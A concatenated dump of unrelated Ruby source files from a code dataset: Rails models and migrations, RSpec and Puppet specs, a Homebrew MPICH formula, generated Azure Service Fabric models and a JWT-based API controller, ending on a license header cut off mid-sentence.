b94305deabdfd6d17c3378b3d63fd53113b29840 | 1,072 | require 'spec_helper'
# Specs for Mapper::Builder.run: requires a block, instance-evals it on a
# builder and returns the builder's mapper.
describe Mapper::Builder, '.run' do
  subject { object.run(mapper_base_class, model, &block) }

  let(:object)            { described_class }
  let(:model)             { mock('Model') }
  let(:builder)           { mock('Builder', :mapper => mapper) }
  let(:mapper)            { mock('Mapper') }
  let(:mapper_base_class) { mock('Mapper Base Class') }

  context 'without block' do
    let(:block) { nil }

    it 'should raise error' do
      expect { subject }.to raise_error(ArgumentError, 'Need a block to build mapper')
    end
  end

  context 'with block' do
    let(:block) { lambda { |instance| } }

    before { described_class.stub(:new => builder) }

    it 'should retun mapper' do
      should be(mapper)
    end

    it 'should instance eval block on builder' do
      block_was_evaled = false
      builder.stub!(:instance_eval) do |proc|
        proc.should equal(block)
        block_was_evaled = true
      end
      subject
      block_was_evaled.should be_true
    end
  end
end
| 25.52381 | 86 | 0.567164 |
185109e6bb82e2a20eaaca2a951336ceb3681cd5 | 148 | class AddSenseLexemeId < ActiveRecord::Migration
# Adds an indexed UUID column linking each sense to its owning lexeme.
def change
  add_column :senses, :lexeme_id, :uuid
  add_index :senses, :lexeme_id
end
end
| 21.142857 | 48 | 0.743243 |
387b42484522c68f62ba55179ed9be7b7bfc174e | 145 | RSpec::Matchers.define :be_file do
# Succeeds when +actual+ exists as a file on the host configured in
# RSpec.configuration (checked over SSH).
match do |actual|
  ssh_exec(RSpec.configuration.host, commands.check_file(actual))
  # NOTE(review): relies on ssh_exec populating $? (a Process::Status);
  # `$? == 0` compares the exit status via Process::Status#==. Confirm the
  # helper actually sets $? rather than returning a status object.
  $? == 0
end
end
| 20.714286 | 67 | 0.703448 |
e2eaec2affdbf476de62454547a7c3176d004e02 | 75 | class Location < ActiveRecord::Base
include DocumentFrequencyConcern
end
| 18.75 | 35 | 0.84 |
e93bf671ede5b75710702e2ee9f7a539bf455b26 | 561 | # frozen_string_literal: true
# typed: true
# compiled: true
# run_filecheck: INITIAL
# run_filecheck: OPT
extend T::Sig
sig {params(str: String, obj: T.untyped).returns(T::Boolean)}
def streq(str, obj)
str === obj
end
# INITIAL-LABEL: "func_Object#streq"
# INITIAL: call i64 @sorbet_int_rb_str_equal
# INITIAL{LITERAL}: }
# OPT-LABEL: "func_Object#streq"
# OPT-NOT: call i64 @sorbet_int_rb_str_equal
# OPT: call i64 @rb_str_equal
# OPT-NOT: call i64 @sorbet_int_rb_str_equal
# OPT{LITERAL}: }
p streq("str", 1)
p streq("str", "str")
p streq("str", nil)
| 20.777778 | 61 | 0.713012 |
e2a198cf1a4a9641ab0bb59f92ed6ed0bd2567db | 261 | class CreateUserLocationJoinTable < ActiveRecord::Migration
# Creates the user/location join table; both foreign keys are required and
# indexed.
def change
  create_table :user_location_joins do |t|
    t.references :location, index: true, null: false
    t.references :user, index: true, null: false

    t.timestamps
  end
end
end
| 26.1 | 59 | 0.712644 |
111d2597d76e304a960ef261abc00a27532973f1 | 12,329 | class Vendor < ActiveRecord::Base
include Concerns::RSAPublicKeyEncryptor
attr_accessor :synced
WIRE_PAYMENT_FIELDS = [:routing_number, :bank_account_number]
CHECK_PAYMENT_FIELDS = [:address1, :city, :zip, :state]
VENDOR_BUILDER_ATTRIBUTES = [:name, :address1, :address2, :city, :state, :zip, :email]
enum source: [:user, :worker]
enum auto_pay_weekly: {
sunday: 0,
monday: 1,
tuesday: 2,
wednesday: 3,
thursday: 4,
friday: 5,
saturday: 6
}
enum payment_term: {
pay_after_bill_received: 0,
pay_day_of_month: 1,
pay_before_due_date: 2,
pay_after_bill_date: 3,
pay_after_due_date: 4,
pay_weekly: 5
}
enum payment_term_end: {
keep_paying: 0,
pay_amount_exeeds: 1,
end_pay_after_n_payments: 2,
pay_before_date: 3,
end_auto_pay_alert: 4
}
enum payment_ammount_type: [:full_payment, :fixed_amount]
enum created_by: [:by_user, :by_worker]
enum payment_status: {
do_not_autopay: 0,
autopay: 1,
allways_mark_as_paid: 2
}
enum status: [:active, :inactive]
belongs_to :user, inverse_of: :vendors
belongs_to :liability_account, class_name: "Account", foreign_key: :liability_account_id
belongs_to :expense_account, class_name: "Account", foreign_key: :expense_account_id
belongs_to :qb_class, foreign_key: :default_qb_class_id
belongs_to :parent, class_name: 'Vendor', foreign_key: :parent_id
has_many :invoices, inverse_of: :vendor
has_many :alerts, as: :alertable
has_many :line_items, inverse_of: :vendor
has_many :invoice_transactions, through: :line_items
has_many :childrens, class_name: 'Vendor', foreign_key: :parent_id
has_many :alert_settings, class_name: 'VendorAlertSettings'
encrypt :routing_number, :bank_account_number, obfuscate_with: Obfuscator.new
after_initialize :set_defaults
before_save :set_qb_d_name
before_save :cancel_accounts_default
before_save :sync_with_user_accounts, :sync_with_quickbooks_desktop
before_save :recalculate_line_items_default
before_save :set_comparation_string
before_save :set_status
after_save :calculate_invoices_due_dates_if_payment_term_changed
after_save :update_bills_if_autopay_changed
after_save :recalculate_invoices_statuses
after_save :update_intercom
after_commit :sync_with_quickbooks, :recalculate_invoice_item_hit_creation
after_update :duplicate_vendor
after_initialize :build_alert_settings, :if => proc { |o| o.alert_settings.nil? }
accepts_nested_attributes_for :invoices, :alert_settings
has_paper_trail
# validates :name, presence: true
# validate :group_fields
normalize_attribute :address1, :address2, :zip, with: [:squish, :blank] do |value|
value.present? && value.is_a?(String) ? value.downcase : value
end
normalize_attribute :state, with: [:squish, :blank] do |value|
value.present? && value.is_a?(String) ? value.upcase : value
end
normalize_attribute :city, with: [:squish, :blank] do |value|
value.present? && value.is_a?(String) ? value.titleize : value
end
normalize_attribute :name, with: [:squish, :blank] do |value|
value.present? && value.is_a?(String) ? value.downcase.titleize : value
end
delegate :liability_accounts, :expense_accounts, :to => :user
delegate :archived_invoices, :less_than_30, :more_than_30, :to => :invoices
def self.typeahead_search(params, current_user)
name = params[:name].try(:downcase)
if user = current_user
user.vendors.active.where("lower(name) LIKE ?", "#{name}%")
elsif user = InvoiceModeration.find_by(invoice_id: params[:invoice_id]).try(:invoice).try(:user)
user.vendors.active.by_user.where("lower(name) LIKE ?", "#{name}%")
else
[]
end
end
def self.only_parents
where(parent_id: nil)
end
def valid_vendor_fields?
fields = VENDOR_BUILDER_ATTRIBUTES.collect { |e| send(e) }
fields.all?(&:present?)
end
def formated_vendor
[name, address1, address2, city, state].map { |e| e.present? ? e : '?' }.join(', ')
end
def unique_line_items(send_as_json = false)
line_items.uniq_items(send_as_json)
end
def wire_payment_fields_filled?
!WIRE_PAYMENT_FIELDS.any? {|field| send(field).blank? }
end
def check_payment_fields_filled?
!CHECK_PAYMENT_FIELDS.any? {|field| send(field).blank? }
end
def wire_or_payment_fields_filled?
wire_payment_fields_filled? || check_payment_fields_filled?
end
alias_method :valid_vendor?, :wire_or_payment_fields_filled?
def autopay_active?
autopay?
end
def pay_day_of_month_date
today = Date.current
max_days = Time.days_in_month(today.month)
day = day_of_the_month >= max_days ? max_days : day_of_the_month
Date.new(today.year, today.month, day)
end
def set_defaults
self.after_recieved ||= user.try(:default_due_date)
end
def vendor_ref
return nil unless qb_id
vendor = Quickbooks::Model::BaseReference.new
vendor.name = name
vendor.value = qb_id
vendor
end
def set_pay_before_due_date(due_date, created_at)
created_at = created_at ? created_at : Date.today
if before_due_date == 0
due_date || created_at.to_date
else
if due_date
before_due_date.business_day.before(due_date).to_date
else
1.business_day.before(created_at.to_date).to_date
end
end
end
def set_pay_after_due_date(due_date, created_at)
created_at = created_at ? created_at : Date.today
if after_due_date == 0
created_at
else
after_due_date.business_day.after(due_date).to_date
end
end
def sync_with_quickbooks
return true if synced
return true unless user && user.intuit_authentication?
return true unless check_payment_fields_filled?
self.synced = true
# QuickbooksSync::Vendors::Vendor.find(id).sync!
end
def merge!(merge_id)
vendor = Vendor.find(merge_id)
childrens << [vendor.childrens, vendor].flatten
touch
end
def unmerge!
update_attributes(parent_id: nil)
invoices.where(status: [4,5,6,7,8,11]).where.not(txn_id: nil).update_all(sync_qb: true)
end
def synced_qb?
edit_sequence && qb_d_id
end
def qb_xml_attributes
hash = {}
hash[:list_id] = qb_d_id if qb_d_id && edit_sequence
hash[:edit_sequence] = edit_sequence if edit_sequence && qb_d_id
hash.merge!({ name: qb_d_name, is_active: active?, company_name: qb_d_name })
hash.merge!(vendor_address: vendor_address_attributes) if vendor_address_attributes.any?
hash.merge!({name_on_check: "#{name}".truncate(41, omission: '') })
hash
end
def vendor_address_attributes
hash = {
addr1: address1,
addr2: address2,
city: city,
state: state,
postal_code: zip
}
hash.delete_if {|k,v| v.nil? || v.try(:blank?) }
hash
end
def to_qb_xml
search_on_qb ? query_qb_d : update_or_create_xml_qb
end
def sync_with_quickbooks_desktop
return true unless name.present?
return true unless [name_changed?, address1_changed?, address2_changed?, city_changed?, zip_changed?, routing_number_changed?, bank_account_number_changed?, liability_account_id_changed?].any?
self.search_on_qb = true unless qb_d_id
self.sync_qb = true
true
end
def sync_with_quickbooks_desktop!
self.search_on_qb = true unless qb_d_id
self.sync_qb = true
save
QBWC.add_job(:update_vendors, true, '', QuickbooksWC::VendorWorker, [] )
true
end
def query_qb_d
{
vendor_query_rq: {
xml_attributes: { "requestID" => id },
full_name: qb_d_name
}
}
end
def update_or_create_xml_qb
sync_type = qb_d_id ? :vendor_mod : :vendor_add
{
"#{sync_type}_rq".to_sym => {
xml_attributes: { "requestID" => id },
sync_type => qb_xml_attributes
}
}
end
# Re-flags in-flight invoices (statuses 4-7) for QuickBooks Desktop sync,
# e.g. after vendor details changed.
def resync_invoices
  invoices.where(status: [4,5,6,7]).each do |invoice|
    invoice.sync_with_quickbooks_desktop(true)
  end
end
# Returns (creating on first use) the vendor's catch-all line item.
def default_item
  line_items.find_or_create_by(description: InvoiceTransaction::DEFAULT_ITEM_NAME)
end
# Overrides the association reader: for a merge parent, returns the invoices
# of self plus all merged children in a single relation.
def invoices
  return super unless children_ids.any?
  ids = [id, children_ids].flatten.compact
  Invoice.where(vendor_id: ids)
end
# Preferred liability account: the vendor's own, then the user's, then the
# user's "Accounts Payable (A/P)" account.
# NOTE(review): a second, private default_liability_account is defined later
# in this class and (being defined later) replaces this one at load time,
# dropping the `liability_account ||` term — confirm which is intended.
def default_liability_account
  @default_liability_account ||= liability_account || user.liability_account || user.accounts.where(name: "Accounts Payable (A/P)").first
end
private

# Validation: the vendor must have at least one complete payment method
# (wire or check) filled out. Fixes the previously unbalanced parenthesis
# in the user-facing error message.
def group_fields
  return if wire_or_payment_fields_filled?
  errors.add(:groupFields, "Must have a payment method (Wire/Check) filled out for every vendor")
end
# When payment terms change on an autopay vendor, promotes invoices that are
# ready for payment to status 5. Returns true so callback chains continue.
def update_bills_if_autopay_changed
  return true unless payment_term_changed? && autopay_active?
  invoices.ready_for_payment.update_all(status: 5)
  true
end
# Backfills the vendor's liability/expense accounts from the user's defaults
# when unset, newly created, or still tracking the default.
def sync_with_user_accounts
  return true unless user
  set_account_liablility_default if selected_from_default_liability || new_record? || !liability_account
  set_account_expense_default if selected_from_default_expense || new_record? || !expense_account
  true
end
# User-level fallback liability account.
# NOTE(review): duplicates (and, being defined later, shadows) the public
# default_liability_account above, which also considers the vendor's own
# liability_account — confirm the duplication is intentional.
def default_liability_account
  @default_liability_account ||= user.liability_account || user.accounts.where(name: "Accounts Payable (A/P)").first
end
# User-level fallback expense account ("Cost of Goods Sold" when the user
# has no explicit expense account). The memo ivar is named @user_default —
# inconsistent with @default_liability_account above, but renaming could
# collide elsewhere, so it is left as-is.
def default_expense_account
  @user_default ||= user.expense_account || user.accounts.where(name: "Cost of Goods Sold").first
end
# Assigns the default liability account and records that it came from the
# default. (Method name keeps the existing "liablility" typo because the
# caller in sync_with_user_accounts uses the same spelling.)
def set_account_liablility_default
  self.liability_account = default_liability_account
  self.selected_from_default_liability = true
end
# Assigns the default expense account and records that it came from the
# default.
def set_account_expense_default
  self.expense_account = default_expense_account
  self.selected_from_default_expense = true
end
# Once a user picks a non-default account, stop tracking the default so
# later default changes don't overwrite the explicit choice.
def cancel_accounts_default
  self.selected_from_default_liability = false if liability_account_id_changed? && default_liability_account != liability_account
  self.selected_from_default_expense = false if expense_account_id_changed? && default_expense_account != expense_account
  true
end
# Propagates account changes to line items that are still tracking the
# vendor defaults.
def recalculate_line_items_default
  line_items.where(selected_from_default_expense: true).update_all(expense_account_id: expense_account_id) if expense_account_id_changed?
  line_items.where(selected_from_default_liability: true).update_all(liability_account_id: liability_account_id) if liability_account_id_changed?
end
# TODO: This should go to a worker
# Queues a background recalculation of invoice due dates whenever any of the
# payment-term attributes changed. Returns true for callback chains.
def calculate_invoices_due_dates_if_payment_term_changed
  attrs_changed = [day_of_the_month_changed?, after_recieved_changed?,
  payment_term_changed?, auto_pay_weekly_changed?,
  before_due_date_changed?, after_due_date_changed?]
  return true unless attrs_changed.any?
  opts = { "vendor_id" => id, "recalculate_date" => true }
  InvoicesWorker.perform_async(opts)
  true
end
# Resets ready/scheduled invoices (statuses 4 and 5) back to status 3 when a
# builder-relevant attribute changed on a still-incomplete vendor.
# Uses short-circuiting any? with a block instead of collect{}.any? — the
# *_changed? dirty-tracking predicates are side-effect free, so behavior is
# unchanged and the intermediate array allocation is avoided.
def recalculate_invoices_statuses
  return true if valid_vendor? && name.present?
  return true unless VENDOR_BUILDER_ATTRIBUTES.any? { |attr| send("#{attr}_changed?") }
  invoices.where(status: [4,5]).update_all(status: 3)
end
# Re-saves invoices (triggering their callbacks) when builder-relevant
# vendor attributes changed, skipping invoices without an amount due, in the
# wrong state, or that already have line-item hits.
# Idiom: short-circuiting any?/|| instead of building throwaway arrays; the
# predicates involved are side-effect free, so behavior is unchanged.
def recalculate_invoice_item_hit_creation
  return true unless VENDOR_BUILDER_ATTRIBUTES.any? { |attr| send("#{attr}_changed?") }
  return true unless valid_vendor_fields?
  invoices.each do |invoice|
    next unless invoice.filled_amount_due?
    next unless invoice.received? || invoice.need_information?
    next if invoice.hits.for_line_item.any?
    invoice.save
  end
end
# When a worker-sourced vendor changes source, keeps a duplicate child copy
# and marks self as user-sourced. Returns true for callback chains.
def duplicate_vendor
  return true unless worker? && source_changed?
  new_vendor = self.dup
  new_vendor.id = nil
  new_vendor.parent_id = id
  new_vendor.save
  update_attributes(source: :user)
  true
end
# Derives a unique QuickBooks Desktop display name ("<name> - billSync",
# optionally numbered) capped at 39 chars, probing the user's vendors until
# an unused name is found.
def set_qb_d_name
  return true unless name.present?
  return true unless user
  new_name = "#{name} - billSync".truncate(39, omission: "- billSync")
  n = 1
  while user.vendors.where(qb_d_name: new_name).present?
    new_name = "#{name} - billSync #{n}".truncate(39, omission: "- billSync #{n}")
    n += 1
  end
  self.qb_d_name = new_name
  true
end
# Pushes the owning user to Intercom asynchronously; skipped in tests.
def update_intercom
  return true if Rails.env.test?
  IntercomUpdater.delayed_update(user)
end
# Caches a denormalized "name, addr1, addr2, city, state, zip" string used
# for vendor comparison/matching. ("comparation" spelling kept — it matches
# the persisted column name.)
def set_comparation_string
  self.comparation_string = [name, address1, address2, city, state, zip].join(", ")
  true
end
# Records that the vendor was created by a user (vs a worker/importer).
def set_status
  return true unless by_user?
  self.created_by = :by_user
  true
end
end
| 29.495215 | 196 | 0.725525 |
# Homebrew formula for MPICH, an MPI implementation. Declarations are
# unchanged; only layout and commentary differ.
class Mpich < Formula
  desc "Implementation of the MPI Message Passing Interface standard"
  homepage "https://www.mpich.org/"
  url "https://www.mpich.org/static/downloads/3.3.2/mpich-3.3.2.tar.gz"
  mirror "https://fossies.org/linux/misc/mpich-3.3.2.tar.gz"
  sha256 "4bfaf8837a54771d3e4922c84071ef80ffebddbb6971a006038d91ee7ef959b9"

  bottle do
    cellar :any
    sha256 "7d46386dd93ee397ce6dd9f3198aa16aa9e1390699396f3f3b4135087f6ed216" => :catalina
    sha256 "865e53a39ea105d5d646986b64a0ad9096cdbf4135d7435448062bc458cb6a64" => :mojave
    sha256 "9d5dc18a7f5a9283f225e117f6ae879f1205249799287150a0e63ef177682077" => :high_sierra
    sha256 "1826a384790d0687debf83b7ce14482df71d6cd51a99105a00340b37ba5018c6" => :x86_64_linux
  end

  head do
    url "https://github.com/pmodels/mpich.git"

    depends_on "autoconf" => :build
    depends_on "automake" => :build
    depends_on "libtool" => :build
  end

  depends_on "gcc" # for gfortran

  conflicts_with "open-mpi", :because => "both install MPI compiler wrappers"

  def install
    if build.head?
      # ensure that the consistent set of autotools built by homebrew is used to
      # build MPICH, otherwise very bizarre build errors can occur
      ENV["MPICH_AUTOTOOLS_DIR"] = HOMEBREW_PREFIX + "bin"
      system "./autogen.sh"
    end

    system "./configure", "--disable-dependency-tracking",
           "--disable-silent-rules",
           "--prefix=#{prefix}",
           "--mandir=#{man}"
    system "make"
    system "make", "check"
    system "make", "install"
  end

  test do
    # Smoke-test the C wrapper: compile and run a 4-rank hello world.
    (testpath/"hello.c").write <<~EOS
      #include <mpi.h>
      #include <stdio.h>

      int main()
      {
        int size, rank, nameLen;
        char name[MPI_MAX_PROCESSOR_NAME];
        MPI_Init(NULL, NULL);
        MPI_Comm_size(MPI_COMM_WORLD, &size);
        MPI_Comm_rank(MPI_COMM_WORLD, &rank);
        MPI_Get_processor_name(name, &nameLen);
        printf("[%d/%d] Hello, world! My name is %s.\\n", rank, size, name);
        MPI_Finalize();
        return 0;
      }
    EOS
    system "#{bin}/mpicc", "hello.c", "-o", "hello"
    system "./hello"
    system "#{bin}/mpirun", "-np", "4", "./hello"

    # Same smoke test through the Fortran wrapper.
    (testpath/"hellof.f90").write <<~EOS
      program hello
      include 'mpif.h'
      integer rank, size, ierror, tag, status(MPI_STATUS_SIZE)
      call MPI_INIT(ierror)
      call MPI_COMM_SIZE(MPI_COMM_WORLD, size, ierror)
      call MPI_COMM_RANK(MPI_COMM_WORLD, rank, ierror)
      print*, 'node', rank, ': Hello Fortran world'
      call MPI_FINALIZE(ierror)
      end
    EOS
    system "#{bin}/mpif90", "hellof.f90", "-o", "hellof"
    system "./hellof"
    system "#{bin}/mpirun", "-np", "4", "./hellof"
  end
end
| 32.678571 | 94 | 0.643352 |
# frozen_string_literal: true
require 'spec_helper'
describe 'apache::mod::ext_filter', type: :class do
  it_behaves_like 'a mod class, without including apache'

  # Debian: the module is loaded via a conf.d-less layout; ext_filter.conf is
  # only written when filter definitions are supplied.
  context 'on a Debian OS' do
    let :facts do
      {
        osfamily: 'Debian',
        operatingsystemrelease: '8',
        lsbdistcodename: 'jessie',
        operatingsystem: 'Debian',
        id: 'root',
        kernel: 'Linux',
        path: '/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin',
        fqdn: 'test.example.com',
        is_pe: false,
      }
    end

    describe 'with no parameters' do
      it { is_expected.to contain_apache__mod('ext_filter') }
      it { is_expected.not_to contain_file('ext_filter.conf') }
    end

    describe 'with parameters' do
      let :params do
        { ext_filter_define: { 'filtA' => 'input=A output=B',
                               'filtB' => 'input=C cmd="C"' } }
      end

      it { is_expected.to contain_file('ext_filter.conf').with_content(%r{^ExtFilterDefine\s+filtA\s+input=A output=B$}) }
      it { is_expected.to contain_file('ext_filter.conf').with_content(%r{^ExtFilterDefine\s+filtB\s+input=C cmd="C"$}) }
    end
  end

  # RedHat: same expectations, plus the conf file lands in httpd's conf.d.
  context 'on a RedHat OS' do
    let :facts do
      {
        osfamily: 'RedHat',
        operatingsystemrelease: '6',
        operatingsystem: 'RedHat',
        id: 'root',
        kernel: 'Linux',
        path: '/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin',
        fqdn: 'test.example.com',
        is_pe: false,
      }
    end

    describe 'with no parameters' do
      it { is_expected.to contain_apache__mod('ext_filter') }
      it { is_expected.not_to contain_file('ext_filter.conf') }
    end

    describe 'with parameters' do
      let :params do
        { ext_filter_define: { 'filtA' => 'input=A output=B',
                               'filtB' => 'input=C cmd="C"' } }
      end

      it { is_expected.to contain_file('ext_filter.conf').with_path('/etc/httpd/conf.d/ext_filter.conf') }
      it { is_expected.to contain_file('ext_filter.conf').with_content(%r{^ExtFilterDefine\s+filtA\s+input=A output=B$}) }
      it { is_expected.to contain_file('ext_filter.conf').with_content(%r{^ExtFilterDefine\s+filtB\s+input=C cmd="C"$}) }
    end
  end
end
| 34.242424 | 122 | 0.60531 |
# API-mode base controller providing JWT issuance/verification and a few
# shared helpers for authorization and sanitization.
class ApplicationController < ActionController::API
  include ActionView::Rendering
  include ActionController::MimeResponds

  # Issues a signed JWT for +user+ that expires two hours from now.
  def token(user)
    payload = { user_id: user.id, exp: (Time.now + 2.hours).to_i }
    JWT.encode(payload, ENV['TOKEN_SECRET'], 'HS256')
  end

  # Decodes the bearer token and stashes the authenticated user's id in
  # @current_user. Renders 401 when the token is missing, malformed,
  # tampered with, or expired.
  def verify_token
    decoded, = JWT.decode(
      bearer_token,
      ENV['TOKEN_SECRET'],
      true,
      { algorithm: 'HS256' }
    )
    @current_user = decoded['user_id']
  rescue StandardError => e
    @error = e
    render :unauthorized, formats: :json, status: :unauthorized
  end

  def current_user
    User.find(@current_user)
  end

  # Halts with 403 unless the authenticated user is an admin.
  def check_is_admin
    render :no_access, formats: :json, status: :forbidden unless current_user.admin?
  end

  def sanitize(val)
    ActionController::Base.helpers.sanitize(val)
  end

  private

  # Extracts the raw token from an "Authorization: Bearer <jwt>" header.
  def bearer_token
    request.headers[:Authorization].split(' ').last
  end
end
| 20.534884 | 84 | 0.667044 |
# encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::ServiceFabric::V6_2_0_9
  module Models
    #
    # Statistics about setup or main entry point of a code package deployed on
    # a Service Fabric node.
    #
    # NOTE: AutoRest-generated model (see file header) — regeneration will
    # overwrite manual edits here.
    #
    class CodePackageEntryPointStatistics

      include MsRestAzure

      # @return [String] The last exit code of the entry point.
      attr_accessor :last_exit_code

      # @return [DateTime] The last time (in UTC) when Service Fabric attempted
      # to run the entry point.
      attr_accessor :last_activation_time

      # @return [DateTime] The last time (in UTC) when the entry point finished
      # running.
      attr_accessor :last_exit_time

      # @return [DateTime] The last time (in UTC) when the entry point ran
      # successfully.
      attr_accessor :last_successful_activation_time

      # @return [DateTime] The last time (in UTC) when the entry point finished
      # running gracefully.
      attr_accessor :last_successful_exit_time

      # @return [String] Number of times the entry point has run.
      attr_accessor :activation_count

      # @return [String] Number of times the entry point failed to run.
      attr_accessor :activation_failure_count

      # @return [String] Number of times the entry point continuously failed to
      # run.
      attr_accessor :continuous_activation_failure_count

      # @return [String] Number of times the entry point finished running.
      attr_accessor :exit_count

      # @return [String] Number of times the entry point failed to exit
      # gracefully.
      attr_accessor :exit_failure_count

      # @return [String] Number of times the entry point continuously failed to
      # exit gracefully.
      attr_accessor :continuous_exit_failure_count


      #
      # Mapper for CodePackageEntryPointStatistics class as Ruby Hash.
      # This will be used for serialization/deserialization.
      # Consumed by the MsRest(Azure) serializer; keys mirror the wire format.
      #
      def self.mapper()
        {
          client_side_validation: true,
          required: false,
          serialized_name: 'CodePackageEntryPointStatistics',
          type: {
            name: 'Composite',
            class_name: 'CodePackageEntryPointStatistics',
            model_properties: {
              last_exit_code: {
                client_side_validation: true,
                required: false,
                serialized_name: 'LastExitCode',
                type: {
                  name: 'String'
                }
              },
              last_activation_time: {
                client_side_validation: true,
                required: false,
                serialized_name: 'LastActivationTime',
                type: {
                  name: 'DateTime'
                }
              },
              last_exit_time: {
                client_side_validation: true,
                required: false,
                serialized_name: 'LastExitTime',
                type: {
                  name: 'DateTime'
                }
              },
              last_successful_activation_time: {
                client_side_validation: true,
                required: false,
                serialized_name: 'LastSuccessfulActivationTime',
                type: {
                  name: 'DateTime'
                }
              },
              last_successful_exit_time: {
                client_side_validation: true,
                required: false,
                serialized_name: 'LastSuccessfulExitTime',
                type: {
                  name: 'DateTime'
                }
              },
              activation_count: {
                client_side_validation: true,
                required: false,
                serialized_name: 'ActivationCount',
                type: {
                  name: 'String'
                }
              },
              activation_failure_count: {
                client_side_validation: true,
                required: false,
                serialized_name: 'ActivationFailureCount',
                type: {
                  name: 'String'
                }
              },
              continuous_activation_failure_count: {
                client_side_validation: true,
                required: false,
                serialized_name: 'ContinuousActivationFailureCount',
                type: {
                  name: 'String'
                }
              },
              exit_count: {
                client_side_validation: true,
                required: false,
                serialized_name: 'ExitCount',
                type: {
                  name: 'String'
                }
              },
              exit_failure_count: {
                client_side_validation: true,
                required: false,
                serialized_name: 'ExitFailureCount',
                type: {
                  name: 'String'
                }
              },
              continuous_exit_failure_count: {
                client_side_validation: true,
                required: false,
                serialized_name: 'ContinuousExitFailureCount',
                type: {
                  name: 'String'
                }
              }
            }
          }
        }
      end
    end
  end
end
| 32.339394 | 79 | 0.528298 |
# frozen_string_literal: true
module Spree
  # Join model for the prototypes <-> taxons many-to-many association.
  class PrototypeTaxon < Spree::Base
    belongs_to :prototype
    belongs_to :taxon
  end
end
| 15.444444 | 36 | 0.748201 |
# sets log level to :warning
Delayed::Backend::ActiveRecord::Job.class_eval do
  class << self
    # Wraps Job.reserve so its (noisy) polling SQL is logged at a quieter
    # level, restoring the caller's level afterwards via ensure.
    # NOTE(review): level 1 is Logger::INFO, not WARN (2), despite the file
    # header saying ":warning" — confirm which was intended.
    def reserve_with_warning(*args, &block)
      log_level = ActiveRecord::Base.logger.level
      ActiveRecord::Base.logger.level = 1
      reserve_without_warning(*args, &block)
    ensure
      ActiveRecord::Base.logger.level = log_level
    end

    # alias_method_chain is deprecated in Rails 5+; Module#prepend is the
    # modern replacement if this is ever migrated.
    alias_method_chain :reserve, :warning
  end
end
Delayed::Worker.default_priority = 50
# encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::ServiceFabric::V6_5_0_36
  module Models
    #
    # Represents health evaluation for a node, containing information about the
    # data and the algorithm used by health store to evaluate health. The
    # evaluation is returned only when the aggregated health state is either
    # Error or Warning.
    #
    # NOTE: AutoRest-generated model (see file header) — regeneration will
    # overwrite manual edits here.
    #
    class NodeHealthEvaluation < HealthEvaluation

      include MsRestAzure


      # Polymorphic discriminator: identifies this evaluation as kind "Node".
      def initialize
        @Kind = "Node"
      end

      attr_accessor :Kind

      # @return [String] The name of a Service Fabric node.
      attr_accessor :node_name

      # @return [Array<HealthEvaluationWrapper>] List of unhealthy evaluations
      # that led to the current aggregated health state of the node. The types
      # of the unhealthy evaluations can be EventHealthEvaluation.
      attr_accessor :unhealthy_evaluations


      #
      # Mapper for NodeHealthEvaluation class as Ruby Hash.
      # This will be used for serialization/deserialization.
      # Consumed by the MsRest(Azure) serializer; keys mirror the wire format.
      #
      def self.mapper()
        {
          client_side_validation: true,
          required: false,
          serialized_name: 'Node',
          type: {
            name: 'Composite',
            class_name: 'NodeHealthEvaluation',
            model_properties: {
              aggregated_health_state: {
                client_side_validation: true,
                required: false,
                serialized_name: 'AggregatedHealthState',
                type: {
                  name: 'String'
                }
              },
              description: {
                client_side_validation: true,
                required: false,
                serialized_name: 'Description',
                type: {
                  name: 'String'
                }
              },
              Kind: {
                client_side_validation: true,
                required: true,
                serialized_name: 'Kind',
                type: {
                  name: 'String'
                }
              },
              node_name: {
                client_side_validation: true,
                required: false,
                serialized_name: 'NodeName',
                type: {
                  name: 'String'
                }
              },
              unhealthy_evaluations: {
                client_side_validation: true,
                required: false,
                serialized_name: 'UnhealthyEvaluations',
                type: {
                  name: 'Sequence',
                  element: {
                    client_side_validation: true,
                    required: false,
                    serialized_name: 'HealthEvaluationWrapperElementType',
                    type: {
                      name: 'Composite',
                      class_name: 'HealthEvaluationWrapper'
                    }
                  }
                }
              }
            }
          }
        }
      end
    end
  end
end
| 30.23301 | 79 | 0.506744 |
module Minotaur
  #
  # Supporting logic for 'pluggable' generator-sets. Features register
  # generator blocks by name via the class-level DSL (method_missing) and
  # are invoked through Theme.generate.
  #
  class Theme
    include Minotaur
    include Minotaur::Geometry

    # The active theme, falling back to DEFAULT_THEME.
    def self.current_theme
      @@current_theme ||= DEFAULT_THEME
    end

    # Looks up the generator registered for +entity+ and invokes it with the
    # given options and optional block.
    def self.generate(entity, opts = {}, &blk)
      generator = @@feature_generators[entity]
      generator.call(opts, &blk)
    end

    class << self
      # Lazily-initialised registry of feature name => generator block.
      def feature_generators
        @@feature_generators ||= {}
      end

      def feature_names
        feature_generators.keys
      end

      # DSL: any unknown class-level call registers its block as a generator,
      # e.g. `Theme.room { ... }` stores the block under :room.
      def method_missing(method_name, *args, &block)
        feature_generators[method_name] = block
      end

      # Keep respond_to? consistent with the catch-all method_missing above
      # (any name is accepted as a generator registration).
      def respond_to_missing?(_method_name, _include_private = false)
        true
      end
    end
  end
end
| 22.791667 | 67 | 0.603291 |
# Tightens the schema: foreign-key columns on these tables may no longer be
# NULL. The down migration restores the permissive state.
class DisallowNullOnForeignKeys < ActiveRecord::Migration
  # table => foreign-key column whose NULL constraint is toggled.
  FOREIGN_KEYS = { topics: :board_id, posts: :topic_id, images: :post_id }.freeze

  def up
    FOREIGN_KEYS.each { |table, column| change_column_null table, column, false }
  end

  def down
    FOREIGN_KEYS.each { |table, column| change_column_null table, column, true }
  end
end
| 27.285714 | 57 | 0.751309 |
#
# Copyright (c) 2006-2010 National ICT Australia (NICTA), Australia
#
# Copyright (c) 2004-2009 WINLAB, Rutgers University, USA
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
